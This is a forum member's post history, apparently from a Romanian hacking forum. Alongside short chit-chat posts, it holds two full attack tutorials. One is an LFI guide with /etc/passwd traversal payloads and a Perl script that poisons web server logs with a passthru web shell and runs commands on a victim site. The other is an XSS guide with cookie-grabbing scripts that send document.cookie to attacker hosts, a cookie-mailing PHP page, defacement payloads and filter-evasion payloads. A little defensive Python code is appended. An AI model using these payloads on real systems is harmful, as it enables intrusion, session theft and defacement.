
CODEX

Active Members
  • Posts

    1354
  • Joined

  • Last visited

  • Days Won

    8

Everything posted by CODEX

  1. very devil, you're more of a satanist than they are (joke). As for satanism and why, I think your site explained it very well, HrN
  2. Aha, so it was vladii's.. fine, now I'll give credit too.. I didn't know it had already been posted once... Maybe an admin could send it to the trash, there's no point in having it twice... I should have searched before posting
  3. I didn't copy it. I have a folder on my PC full of tutorials about things like this, XSS, LFI and all sorts. I thought I'd post it.. nobody signed it and I've had them for a long time..
  4. http://www.hack-test.com/ let's see you
  5. He didn't know either, 99 or 100% undetectable. Head, put that program here so I can send it to someone too
  6. Not to mention that on that forum it's nothing but copies from RST; you take everything you can and simply copy it without any CREDIT, or you don't even mention the SOURCE. Shame on you. Supposedly a hi5 vulnerability.. supposedly the admin made a list of the hi5 vulnerabilities and in fact they were nemessis's. Shame, I have nothing else to say. Delete it already
  7. and what malicious code does it send?
  8. wait, I'm making an account on as.ro too, to see how it works
  9. And how do you know they read the rules? Practically they should go to the rules, stay there 60 seconds and then hit activate account or something like that..
  10. Hello! In this tutorial you will learn how to exploit the LFI vulnerability of a site. First, let's look at this small PHP code:

    <?php $page = $_GET['page']; include($page); ?>

    This is code that should never be used, vulnerable to LFI, because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability using the following code:

    site.host/index.php?page=../../../../../../../etc/passwd

    In some cases there is no need to put ../../../../../../.., etc/passwd being enough to get access where needed. If the site is hosted on Unix, the users' passwords are stored in /etc/passwd (in case the password is not shadowed; in that case it is in /etc/shadow, which we could only access if we had root rights), and the code above shows us these passwords and usernames. Now all you have to do is decode the password. An encrypted password (in this case the password is shadowed and is in /etc/shadow) should look something like this:

    username:x:503:100:FullName:/home/username:/bin/sh

    In this case the password is shadowed and is in /etc/shadow; another example of a password is:

    username:!:503:100:FullName:/home/username:/bin/sh

    Other "places" where you can find the passwords besides /etc/passwd would be: /etc/shadow, /etc/group, /etc/master.passwd, /etc/security/group, /etc/security/passwd, /etc/security/user, /etc/security/environ, /etc/security/limits

    In case the browser shows a .php at the end of the include (and automatically /etc/passwd.php will not exist), add %00 at the end of the include; the server will omit everything written after %00. Example code:

    site.host/index.php?file=../../../../../../../../etc/passwd%00

    Now we will try to run commands on the server by injecting PHP code into the logs, then running it. Some log addresses:

    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log

    OK, now let's take a look at the log where the pages that do not exist are saved, and at the following code: <? passthru($_GET[cmd]) ?>. If we type in the browser:

    site.host/<? passthru($_GET[cmd]) ?>

    it will obviously show us a page saying that this code does not exist on the server, because the browser automatically encodes the URL, and the page we accessed gets translated by the browser into:

    site.host/%3C?%20passthru($_GET[cmd])%20?>

    So we will have to do something else... We can use the following Perl script:

    #!/usr/bin/perl -w
    use IO::Socket;
    use LWP::UserAgent;
    $site="victim.com";
    $path="/folder/";
    # single quotes: in double quotes Perl would interpolate $_GET[cmd]
    $code='<? passthru($_GET[cmd]) ?>';
    $log = "../../../../../../../etc/httpd/logs/error_log";
    print "Trying to inject the code";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n";
    print $socket "GET ".$path.$code." HTTP/1.1\r\n";
    print $socket "User-Agent: ".$code."\r\n";
    print $socket "Host: ".$site."\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    print "\nCode $code successfully injected in $log\n";
    print "\nType command to run or exit to end:\n";
    $cmd = <STDIN>;
    while($cmd !~ "exit")
    {
        $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n";
        print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
        print $socket "Host: ".$site."\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\r\n";
        while ($show = <$socket>)
        {
            print $show;
        }
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
    }

    Copy/paste this and save it as ex.pl, but don't forget to change the following things in the exploit: 1) change the site name 2) change the log name and the path to it 3) change index.php= to whatever you want. Run the script and it will ask you which commands to run!!! You're on your own from here on!!!

    Useful links: http://www.milw0rm.com/video/watch.php?id=57 This is a small video tutorial, try to watch it because it is very good.

    by Vladii
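The include($_GET['page']) pattern in the tutorial, from the defender's side: an added Python example (not from the tutorial or its author) that maps a page parameter onto one file under a fixed directory through an allowlist, rejecting the ../ chains, the %00 truncation and the absolute paths the tutorial relies on. PAGES_DIR and ALLOWED_PAGES are assumed deployment values.

```python
import os
import re
from urllib.parse import unquote

# Assumed deployment values for this example (not from the tutorial).
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


class UnsafePage(ValueError):
    """Raised when a page parameter must not reach include()."""


def resolve_page(raw: str, pages_dir: str = PAGES_DIR) -> str:
    """Map ?page=... to one file under pages_dir, or raise UnsafePage.

    Covers the tricks the tutorial uses: '../' chains, '%00' (PHP before
    5.3.4 cut the path at the NUL byte), absolute paths and URL encoding.
    """
    candidate = unquote(raw)            # '%00' -> '\x00', '%2e%2e' -> '..'
    if "\x00" in candidate:
        raise UnsafePage("NUL byte in page name")
    # Only a bare name is accepted: no slashes, dots or extension.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", candidate):
        raise UnsafePage("page name outside allowed charset")
    if candidate not in ALLOWED_PAGES:
        raise UnsafePage("page not on allowlist")
    # Containment check even for allowlisted names: the resolved file must
    # still live under pages_dir after symlinks are followed.
    base = os.path.realpath(pages_dir)
    full = os.path.realpath(os.path.join(base, candidate + ".php"))
    if os.path.commonpath([base, full]) != base:
        raise UnsafePage("resolved path escaped pages_dir")
    return full


def is_safe(raw: str) -> bool:
    """Convenience wrapper: True only for parameters that resolve."""
    try:
        resolve_page(raw)
    except UnsafePage:
        return False
    return True


if __name__ == "__main__":
    for p in ("home", "../../../../../../../etc/passwd",
              "../../../../../../../../etc/passwd%00", "/etc/passwd"):
        print(f"{p!r}: {'allowed' if is_safe(p) else 'rejected'}")
```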
  11. CODEX

    Hello!

    What matters is that the guy wants to learn something.. and first reads the forum and then posts. Welcome
  12. It worked for me... now I won't try it again because I'm lazy, but I know for sure that I took a virus maker, made a virus, turned off the AV, made it undetectable, turned the AV on and it said nothing.... I'll test it once more step by step when I have time
  13. what? what do you mean? explain to us how you do it.. if you want, of course
  14. CODEX

    Site

    well done.....good work, you still have some levels to pass
  15. CODEX

    Site

    Level Name: Channel 5. Well, there it makes me download a thing, pwd.exe, but it tells me it's a virus... it warns me that it's a virus... I disabled it and now I can't download it anymore, it gives me page not found... anyway, give me some hints for the others too
  16. Well, since you insisted, 15 points; now I have to pass the others too because the game is interesting
  17. Is it better like this? I'll add a few more things to it (the part that's missing, so it's "more complete")
  18. ok, I promise I'll translate it... I'm starting now, I'll do something for try too..
  19. Cross Site Scripting - Attack and Defense guide
    By Xylitol. Translated into Romanian by CODEX for www.rstcenter.com

    INDEX:
    1. What is XSS?
    2. Where and why does XSS appear?
    3. How to make a cookie grabber
    4. How to defend against XSS
    5. Deface methods
    6. Filters
    7. Flash Attack
    8. XSS Upload
    9. Phishing XSS

    .:: Chapter 1 - What is XSS? ::.

    First of all we need to know that XSS is a vulnerability that appears on a server or site and allows inserting a script into an HTML page on a server. A found XSS is displayed in a textbox.

    .:: Chapter 2 - Where and why does XSS appear? ::.

    XSS appears because of poor filtering of the code, or in many cases it is not filtered at all. I'll take the following code; it is used in most tutorials to illustrate XSS.

    CODE:
    <html>
    <head>
    <title>Xss Vulnerabilitate</title>
    </head>
    <!-- html --!><!-- it's best if you use html --!>
    .....................
    <form action="" method=post>
    codul Dvs:</br></br>
    <input type="text" name="xss"></br></br>
    <input type="submit" value="XSSvul"></br>
    </form>
    ......................
    <!-- the script follows --!>
    <?
    if(isset($xss))
    {
    ....
    // If xss exists then we execute CODE:
    echo \'$test \';

    This is where XSS appears, because the code is not filtered. The code is so weak that it cannot filter the forbidden symbols in the code, such as: <> , / ' " etc.

    .:: Chapter 3 - Make a cookie grabber ::.

    Insert this code into a vulnerable page:

    <script>
    window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
    </script>

    (www.Hax0r.com = your site)

    Open notepad and make a document: cookie.php; copy/paste this code:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Error</title>
    <style type="text/css">
    <!--
    body,td,th { color: #FFFFFF; }
    body { background-color: #000000; }
    -->
    </style></head>
    <? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?>
    <body>
    <h2>Error - Access denied for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
    </body>
    </html>

    .:: Chapter 4 - Securing XSS ::.

    FIX it: To get rid of XSS vulnerabilities we use htmlentities. On line 16 we replace:

    <body>
    <span class="alerte">Search result :</span><?php echo $_POST['Vulnerability']; ?>
    </body>

    with:

    <body>
    <span class="alerte">Search result :</span><?php if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?>
    </body>

    We use the htmlspecialchars() function in PHP; other functions: htmlentities(), quotes, strip_tags() ...

    .:: Chapter 5 - Deface methods ::.

    Here the deface can be done simply. This doesn't mean that you have access to the database or that you delete the site; you just insert something into the HTML code, such as:

    Deface with an image:

    or a flash video:
    <EMBED SRC="http://hax0r.com/Haxored.swf"

    redirect:
    <script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

    also see:
    <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />

    .:: Chapter 6 - Filters and unfiltered scripts ::.

    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    '">><marquee><h1>XSS</h1></marquee>
    '">><script>alert('XSS')</script>
    '>><marquee><h1>XSS</h1></marquee>
    "><script alert(String.fromCharCode(88,83,83))</script>
    <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    <div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
    window.alert("Xyli !");
    "/></a></><img src=1.gif onerror=alert(1)>
    mouse over
    <body onLoad="alert('XSS');"
    <body onunload="javascript:alert('XSS');">
    click me
    <script language="JavaScript">alert('XSS')</script>
    '); alert('XSS
    <font style='color:expression(alert(document.cookie))'>
    <IMG DYNSRC=\"javascript:alert('XSS')\">
    <IMG LOWSRC=\"javascript:alert('XSS')\">
    </textarea><script>alert(/xss/)</script>
    </title><script>alert(/xss/)</script>
    <script src=http://yoursite.com/your_files.js></script>
    "><script>alert(0)</script>
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <marquee><script>alert('XSS')</script></marquee>
    <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    <img src=foo.png onerror=alert(/xssed/) />
    <script>alert(String.fromCharCode(88,83,83))</script>
    <scr<script>ipt>alert('XSS');</scr</script>ipt>
    <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+ escape(document.cookie)</script>
    <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    <script>alert('XSS');</script>
    <script>alert(1);</script>

    These are only a part; you can find more on google.

    .:: Chapter 7 - Flash attack ::.

    Flash is used for complex animations, simulations, creation of games etc. What is interesting for us is the getURL() action. This function allows us to redirect the end user to another page. Its syntax is built as follows:

    getURL(url:String, [window: String,[method:String]])

    example:
    getURL("http://victime.com/login.php?logout=true","_self");

    url: indicates the URL of the site
    window: specifies within which frame the request must take place (_self, _blank...)
    method: method of the request, GET or POST (by default GET)

    Here is the handling of ActionScript and JavaScript to display an alert:

    getURL("javascript:alert('XSS'");

    In 2002 the danger of this facility was shown; one could, for example, display the cookie of visitors in this manner:

    getURL("javascript:alert(document.cookie)")

    In December 2005 a new variant appeared, consisting of taking advantage of a non-permanent XSS flaw and the possibility of putting a flash file in one's signature to obtain a permanent XSS; moreover, the author of this variant used this technique to infect MySpace with a derivative of Samy's XSS worm: Samy Reloaded.

    Cookie stealer in flash? No, but there is a technique to do it. Example in a flash file:

    GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");

    and in Haxored.js:

    document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;

    To secure it, a simple solution: do not allow flash files in your web app.

    .:: Chapter 8 - XSS upload ::.

    Make Haxored.gif in Paint, for example. After you have opened Haxored.GIF in notepad, delete everything and insert this:

    GIF89a<script>alert("XSS")</script>

    Save and close it, upload Haxored.gif to a free image hosting and the XSS appears...

    * In Mozilla the error will not appear; to see the error use IE.

    Why do we add GIF89a? Well, some uploads, like this one, check that the 'GIF89a' code is contained in the image, as in any .GIF. The vulnerability of this upload results from checking the 'GIF89a' code for confirmation, but nothing of the possible malicious code contained in this image.

    GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

    To know the code for another image format, it is enough to open a jpg or other image with a text editor; for example a png file: ‰PNG

    PNG = ‰PNG
    GIF = GIF89a
    JPG =
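Chapter 4 patches the reflected value with htmlentities(); before PHP 8.1 its default flags (ENT_COMPAT) did not encode the single quote, so the same fix leaves a single-quoted attribute injectable. The Python below is an added example, not part of the guide or Xylitol's code, that imitates both flag sets and checks the rendered markup with a parser; the payload strings are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed inputs in the style of the chapter 6 vectors (not real traffic).
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "' onmouseover='alert(document.cookie)",   # breaks out of a '...' attribute
    '"><img src=1.gif onerror=alert(1)>',
]


def escape_compat(value: str) -> str:
    """Imitates htmlentities() with ENT_COMPAT, the default before PHP 8.1:
    encodes &, <, > and double quotes but leaves the single quote alone."""
    return html.escape(value, quote=False).replace('"', "&quot;")


def escape_quotes(value: str) -> str:
    """Imitates htmlentities($s, ENT_QUOTES): the single quote is encoded too."""
    return html.escape(value, quote=True)      # ' becomes &#x27;


def render_text(value: str, esc) -> str:
    """Text context, as in the chapter 4 fix."""
    return '<span class="alerte">Search result :</span>' + esc(value)


def render_attr(value: str, esc) -> str:
    """Single-quoted attribute context, the one ENT_COMPAT does not cover."""
    return "<input type='text' name='Vulnerability' value='" + esc(value) + "'>"


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []                         # (tag name, attribute names)

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))


def injected(markup: str) -> bool:
    """True when the rendered markup contains a tag or on* handler that the
    template never emitted, i.e. the payload was parsed as HTML."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return any(tag in ("script", "img") or any(n.startswith("on") for n in names)
               for tag, names in parser.tags)
```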
  20. http://en-us.www.mozilla.com/en-US/firefox/phishing-protection/ the site is down.. the one that had the scam
  21. that's another one, now I'm making a more hi-tech one
  22. look for the vulnerability on the site and try to access the file where the passwords are saved. Pretty stupid question; you'd better read something before asking
  23. CODEX

    Yahoo Bug ;)

    And you, as a user with few posts, explain to the others who didn't realize that it's not a bug, it's a trick, dohhh. There was really no point in me posting since the same thing was said above! Instead of saying that it's a trick and not a bug, better say something intelligent
  24. Unfortunately I got home late! I made this in 30 min... if you wait until tomorrow or give me some directions I'll make more so you have something to choose from
  25. I'll be home around 2, I'm leaving now; I'll make you something nice, you'll surely like it